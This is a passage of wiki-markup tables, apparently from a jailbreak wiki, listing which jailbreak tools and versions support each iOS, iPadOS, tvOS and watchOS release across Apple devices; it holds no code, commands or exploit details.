| [[unc0ver]]
| 5.2.0
| colspan="10" {{yes}}
|-
| rowspan="2" | 12.2
| [[Chimera]]
| 1.4.0
| colspan="8" {{yes}}
| colspan="3" {{partial}}
| colspan="3" {{yes}}
| {{partial}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="15" {{yes}}
|-
| 12.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="3" {{no}}
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| 12.3.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="3" {{no}}
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| rowspan="3" | 12.4
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="3" {{no}}
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[Chimera]]
| 1.4.0
| colspan="8" {{yes}}
| colspan="3" {{partial}}
| colspan="3" {{yes}}
| {{partial}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="15" {{yes}}
|-
| 12.4.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="3" {{no}}
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| 12.4.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="2" {{yes|Yes (Semi-Tethered)}}
| colspan="9" {{n/a}}
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| {{n/a}}
|-
| 12.4.3
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| colspan="10" {{n/a}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{n/a}}
|-
| 12.4.4
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| colspan="10" {{n/a}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{n/a}}
|-
| 12.4.5
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| colspan="10" {{n/a}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{n/a}}
|-
| 12.4.6
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| colspan="10" {{n/a}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{n/a}}
|-
| 12.4.7
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| colspan="10" {{n/a}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{n/a}}
|-
| 12.4.8
| [[checkra1n]]
| 0.10.2 beta<ref name="untestedOS"></ref>
| {{yes|Yes (Semi-Tethered)}}
| colspan="10" {{n/a}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{n/a}}
|}

<references>
<ref name="untestedOS">Check the "Allow untested iOS/iPadOS/tvOS versions" checkbox in the options view to bypass the version check.</ref>
</references>

{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="16" | Device
|-
! [[iPhone 5s]]
! [[N61AP|iPhone 6]]
! [[N56AP|iPhone 6 Plus]]
! [[iPhone 6s]]
! [[iPhone 6s Plus]]
! [[iPhone SE (1st generation)]]
! [[iPhone 7]]
! [[iPhone 7 Plus]]
! [[iPhone 8]]
! [[iPhone 8 Plus]]
! [[iPhone X]]
! [[iPhone XR]]
! [[iPhone XS]]
! [[iPhone XS Max]]
! [[N102AP|iPod touch (6th generation)]]
! [[N112AP|iPod touch (7th generation)]]
|-
| rowspan="2" | 12.0
| [[Chimera]]
| 1.4.0
| colspan="15" rowspan="2" {{yes}}
| rowspan="16" {{n/a}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.0.1
| [[Chimera]]
| 1.4.0
| colspan="15" rowspan="2" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.1
| [[Chimera]]
| 1.4.0
| colspan="15" rowspan="2" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.1.1
| [[Chimera]]
| 1.4.0
| colspan="15" rowspan="2" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.1.2
| [[Chimera]]
| 1.4.0
| colspan="14" rowspan="2" {{yes}}
| rowspan="2" {{n/a}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.1.3
| [[Chimera]]
| 1.4.0
| colspan="11" {{yes}}
| colspan="3" {{partial}}
| {{yes}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="15" {{yes}}
|-
| rowspan="2" | 12.1.4
| [[Chimera]]
| 1.4.0
| colspan="11" {{yes}}
| colspan="3" {{partial}}
| {{yes}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="15" {{yes}}
|-
| rowspan="2" | 12.2
| [[Chimera]]
| 1.4.0
| colspan="11" {{yes}}
| colspan="3" {{partial}}
| {{yes}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="15" {{yes}}
|-
| 12.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="11" {{yes|Yes (Semi-Tethered)}}
| colspan="3" {{no}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
|-
| 12.3.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="11" {{yes|Yes (Semi-Tethered)}}
| colspan="3" {{no}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
|-
| 12.3.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="9" {{n/a}}
| {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{n/a}}
|-
| rowspan="3" | 12.4
| [[checkra1n]]
| 0.10.2 beta
| colspan="11" {{yes|Yes (Semi-Tethered)}}
| colspan="3" {{no}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
|-
| [[Chimera]]
| 1.4.0
| colspan="11" {{yes}}
| colspan="3" {{partial}}
| colspan="2" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="16" {{yes}}
|-
| rowspan="2" | 12.4.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="11" {{yes|Yes (Semi-Tethered)}}
| colspan="3" {{no}}
| colspan="2" {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="12" {{no}}
| colspan="2" {{yes}}
| colspan="2" {{no}}
|-
| 12.4.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="6" {{yes|Yes (Semi-Tethered)}}
| colspan="8" {{n/a}}
| {{yes|Yes (Semi-Tethered)}}
| {{n/a}}
|-
| 12.4.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| colspan="11" {{n/a}}
| {{yes|Yes (Semi-Tethered)}}
| {{n/a}}
|-
| 12.4.4
| [[checkra1n]]
| 0.10.2 beta
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| colspan="11" {{n/a}}
| {{yes|Yes (Semi-Tethered)}}
| {{n/a}}
|-
| 12.4.5
| [[checkra1n]]
| 0.10.2 beta
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| colspan="11" {{n/a}}
| {{yes|Yes (Semi-Tethered)}}
| {{n/a}}
|-
| 12.4.6
| [[checkra1n]]
| 0.10.2 beta
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| colspan="11" {{n/a}}
| {{yes|Yes (Semi-Tethered)}}
| {{n/a}}
|-
| 12.4.7
| [[checkra1n]]
| 0.10.2 beta
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| colspan="11" {{n/a}}
| {{yes|Yes (Semi-Tethered)}}
| {{n/a}}
|-
| 12.4.8
| [[checkra1n]]
| 0.10.2 beta<ref name="untestedOS"></ref>
| colspan="3" {{yes|Yes (Semi-Tethered)}}
| colspan="11" {{n/a}}
| {{yes|Yes (Semi-Tethered)}}
| {{n/a}}
|}

<references>
<ref name="untestedOS">Check the "Allow untested iOS/iPadOS/tvOS versions" checkbox in the options view to bypass the version check.</ref>
</references>

====13.x====
{| class="wikitable"
|-
! rowspan="2" | iPadOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="15" | Device
|-
! [[iPad (5th generation)]]
! [[iPad (6th generation)]]
! [[iPad (7th generation)]]
! [[iPad mini 4]]
! [[iPad mini (5th generation)]]
! [[iPad Air 2]]
! [[iPad Air (3rd generation)]]
! [[iPad Pro (12.9-inch)]]
! [[iPad Pro (9.7-inch)]]
! [[iPad Pro (12.9-inch) (2nd generation)]]
! [[iPad Pro (10.5-inch)]]
! [[iPad Pro (11-inch)]]
! [[iPad Pro (12.9-inch) (3rd generation)]]
! [[iPad Pro (11-inch) (2nd generation)]]
! [[iPad Pro (12.9-inch) (4th generation)]]
|-
| rowspan="2" | 13.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
| colspan="2" rowspan="18" {{n/a}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.1.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.1.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.1.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.2.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.2.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.3.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="2" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="13" {{yes}}
|-
| rowspan="2" | 13.4
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="4" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="15" {{yes}}
|-
| rowspan="2" | 13.4.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="4" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="15" {{yes}}
|-
| rowspan="2" | 13.5
| [[checkra1n]]
| 0.10.2 beta
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="4" {{no}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="15" {{yes}}
|-
| 13.5.1
| [[checkra1n]]
| 0.10.2 beta <ref name="untestedOS"></ref>
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="4" {{no}}
|-
| 13.6
| [[checkra1n]]
| 0.10.2 beta <ref name="untestedOS"></ref>
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| {{no}}
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
| colspan="4" {{yes|Yes (Semi-Tethered)}}
| colspan="4" {{no}}
|}
<references><ref name="untestedOS">Check the "Allow untested iOS/iPadOS/tvOS versions" checkbox in the options view to bypass the version check.</ref></references>

{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="16" | Device
|-
! [[iPhone 6s]]
! [[iPhone 6s Plus]]
! [[iPhone SE (1st generation)]]
! [[iPhone 7]]
! [[iPhone 7 Plus]]
! [[iPhone 8]]
! [[iPhone 8 Plus]]
! [[iPhone X]]
! [[iPhone XR]]
! [[iPhone XS]]
! [[iPhone XS Max]]
! [[iPhone 11]]
! [[iPhone 11 Pro]]
! [[iPhone 11 Pro Max]]
! [[iPhone SE (2nd generation)]]
! [[iPod touch (7th generation)]]
|-
| rowspan="2" | 13.0
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| rowspan="20" {{n/a}}
| rowspan="2" {{n/a}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
|-
| rowspan="2" | 13.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.1.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.1.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.1.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.2.2
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.2.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.3
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.3.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="6" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="14" {{yes}}
| {{yes}}
|-
| rowspan="2" | 13.4
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="7" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="16" {{yes}}
|-
| rowspan="2" | 13.4.1
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="7" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="16" {{yes}}
|-
| rowspan="2" | 13.5
| [[checkra1n]]
| 0.10.2 beta
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="7" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="16" {{yes}}
|-
| 13.5.1
| [[checkra1n]]
| 0.10.2 beta <ref name="untestedOS"></ref>
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="7" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|-
| 13.6
| [[checkra1n]]
| 0.10.2 beta <ref name="untestedOS"></ref>
| colspan="8" {{yes|Yes (Semi-Tethered)}}
| colspan="7" {{no}}
| {{yes|Yes (Semi-Tethered)}}
|}
<references><ref name="untestedOS">Check the "Allow untested iOS/iPadOS/tvOS versions" checkbox in the options view to bypass the version check.</ref></references>

=== tvOS ===
==== 9.x ====
{| class="wikitable"
|-
! rowspan="2" | tvOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! Device
|-
! [[J42dAP|Apple TV (4th generation)]]
|-
| 9.0
| rowspan="2" | [[Pangu9]]
| rowspan="2" | 1.0.0
| rowspan="2" {{yes}}
|-
| 9.0.1
|-
| 9.1
| colspan="2" rowspan="5" | No Tool Available
| rowspan="5" {{no}}
|-
| 9.1.1
|-
| 9.2
|-
| 9.2.1
|-
| 9.2.2
|}

==== 10.x ====
{| class="wikitable"
|-
! rowspan="2" | tvOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! Device
|-
! [[J42dAP|Apple TV (4th generation)]]
|-
| 10.0
| rowspan="3" | [[LiberTV]]
| rowspan="3" | 1.0
| rowspan="3" {{yes}}
|-
| 10.0.1
|-
| 10.1
|-
| 10.1.1
| colspan="2" rowspan="3" | No Tool Available
| rowspan="3" {{no}}
|-
| 10.2
|-
| 10.2.1
|-
| rowspan="2" | 10.2.2
| [[backr00m]]
| Any
| rowspan="2" {{yes}}
|-
| [[greeng0blin]]
| 1.1
|}

==== 11.x ====
{| class="wikitable"
|-
! rowspan="2" | tvOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="2" | Device
|-
! [[J42dAP|Apple TV (4th generation)]]
! [[J105aAP|Apple TV 4K]]
|-
| rowspan="4" | 11.0
| [[backr00m]]
| Any
| colspan="2" rowspan="22" {{yes}}
|-
| [[LiberTV]]
| 1.1
|-
| [[Electra|electraTV]]
| 1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="4" | 11.1
| [[backr00m]]
| Any
|-
| [[LiberTV]]
| 1.1
|-
| [[Electra|electraTV]]
| 1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 11.2
| [[Electra|electraTV]]
| 1.0.4-1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 11.2.1
| [[Electra|electraTV]]
| 1.0.4-1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 11.2.5
| [[Electra|electraTV]]
| 1.0.4-1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 11.2.6
| [[Electra|electraTV]]
| 1.0.4-1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 11.3
| [[Electra|electraTV]]
| 1.0.4-1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 11.4
| [[Electra|electraTV]]
| 1.0.4-1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 11.4.1
| [[Electra|electraTV]]
| 1.0.4-1.3.2
|-
| [[unc0verTV]]
| 5.2.0
|}

==== 12.x ====
{| class="wikitable"
|-
! rowspan="2" | tvOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="2" | Device
|-
! [[J42dAP|Apple TV (4th generation)]]
! [[J105aAP|Apple TV 4K]]
|-
| rowspan="3" | 12.0
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[Chimera|ChimeraTV]]
| 1.3.9
| rowspan="2" colspan="2" {{yes}}
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="3" | 12.0.1
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[Chimera|ChimeraTV]]
| 1.3.9
| rowspan="2" colspan="2" {{yes}}
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="3" | 12.1
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[Chimera|ChimeraTV]]
| 1.3.9
| rowspan="2" colspan="2" {{yes}}
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="3" | 12.1.1
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[Chimera|ChimeraTV]]
| 1.3.9
| rowspan="2" colspan="2" {{yes}}
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="3" | 12.1.2
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[Chimera|ChimeraTV]]
| 1.3.9
| rowspan="2" colspan="2" {{yes}}
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="3" | 12.2
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[Chimera|ChimeraTV]]
| 1.3.9
| rowspan="2" colspan="2" {{yes}}
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 12.2.1
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|-
| rowspan="2" | 12.3
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|-
| rowspan="3" | 12.4
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[Chimera|ChimeraTV]]
| 1.3.9
| rowspan="2" colspan="2" {{yes}}
|-
| [[unc0verTV]]
| 5.2.0
|-
| rowspan="2" | 12.4.1
| [[checkra1n]]
| 0.10.1 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|}

==== 13.x ====
{| class="wikitable"
|-
! rowspan="2" | tvOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="2" | Device
|-
! [[J42dAP|Apple TV (4th generation)]]
! [[J105aAP|Apple TV 4K]]
|-
| rowspan="2" | 13.0
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|-
| rowspan="2" | 13.2
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|-
| rowspan="2" | 13.3
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|-
| rowspan="2" | 13.3.1
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|-
| rowspan="2" | 13.4
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|-
| rowspan="2" | 13.4.5
| [[checkra1n]]
| 0.10.2 beta
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| [[unc0verTV]]
| 5.2.0
| colspan="2" {{yes}}
|-
| 13.4.6
| [[checkra1n]]
| 0.10.2 beta <ref name="untestedOS"></ref>
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|-
| 13.4.8
| [[checkra1n]]
| 0.10.2 beta <ref name="untestedOS"></ref>
| {{yes|Yes (Semi-Tethered)}}
| {{no}}
|}
<references><ref name="untestedOS">Check the "Allow untested iOS/iPadOS/tvOS versions" checkbox in the options view to bypass the version check.</ref></references>

===watchOS===
====1.x====
{| class="wikitable"
|-
! rowspan="2" | watchOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="2" | Device
|-
! [[Apple Watch (1st generation)]]
|-
| 1.0
| colspan="2" rowspan="2" | No Tool Available
| {{no}}
|-
| 1.0.1
| {{no}}
|}

====2.x====
{| class="wikitable"
|-
! rowspan="2" | watchOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="2" | Device
|-
! [[Apple Watch (1st generation)]]
|-
| 2.0
| colspan="2" rowspan="6" | No Tool Available
| {{no}}
|-
| 2.0.1
| {{no}}
|-
| 2.1
| {{no}}
|-
| 2.2
| {{no}}
|-
| 2.2.1
| {{no}}
|-
| 2.2.2
| {{no}}
|}

====3.x====
{| class="wikitable"
|-
! rowspan="2" | watchOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="3" | Device
|-
! [[Apple Watch (1st generation)]]
! [[Apple Watch Series 1]]
! [[Apple Watch Series 2]]
|-
| 3.0
| colspan="2" rowspan="7" | No Tool Available
| colspan="3" {{no}}
|-
| 3.1
| colspan="3" {{no}}
|-
| 3.1.1
| colspan="3" {{no}}
|-
| 3.1.3
| colspan="3" {{no}}
|-
| 3.2
| colspan="3" {{no}}
|-
| 3.2.2
| colspan="3" {{no}}
|-
| 3.2.3
| colspan="3" {{no}}
|}

====4.x====
{| class="wikitable"
|-
! rowspan="2" | watchOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="4" | Device
|-
! [[Apple Watch (1st generation)]]
! [[Apple Watch Series 1]]
! [[Apple Watch Series 2]]
! [[Apple Watch Series 3]]
|-
| 4.0
| rowspan="3" | [[jelbrekTime]]
| rowspan="3" | 1.0
| colspan="3" {{no}}
| {{partial|Yes}}<ref name="SSH_dev" />
|-
| 4.0.1
| colspan="3" {{no}}
| {{partial|Yes}}<ref name="SSH_dev" />
|-
| 4.1
| colspan="3" {{no}}
| {{partial|Yes}}<ref name="SSH_dev" />
|-
| 4.2
| colspan="2" rowspan="6" | No Tool Available
| colspan="4" {{no}}
|-
| 4.2.2
| colspan="4" {{no}}
|-
| 4.2.3
| colspan="4" {{no}}
|-
| 4.3
| colspan="4" {{no}}
|-
| 4.3.1
| colspan="4" {{no}}
|-
| 4.3.2
| colspan="4" {{no}}
|}
<references>
<ref name="SSH_dev">Only SSH support is included with this jailbreak, making it useless to the average jailbreak user.</ref>
</references>

====5.x====
{| class="wikitable"
|-
! rowspan="2" | watchOS Version
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="4" | Device
|-
! [[Apple Watch Series 1]]
! [[Apple Watch Series 2]]
! [[Apple Watch Series 3]]
! [[Apple Watch Series 4]]
|-
| 5.0
| colspan="2" rowspan="17" | No Tool Available
| colspan="4" {{no}}
|-
| 5.0.1
| colspan="4" {{no}}
|-
| 5.1
| colspan="4" {{no}}
|-
| 5.1.1
| colspan="4" {{no}}
|-
| 5.1.2
| colspan="4" {{no}}
|-
| 5.1.3
| colspan="4" {{no}}
|-
| 5.2
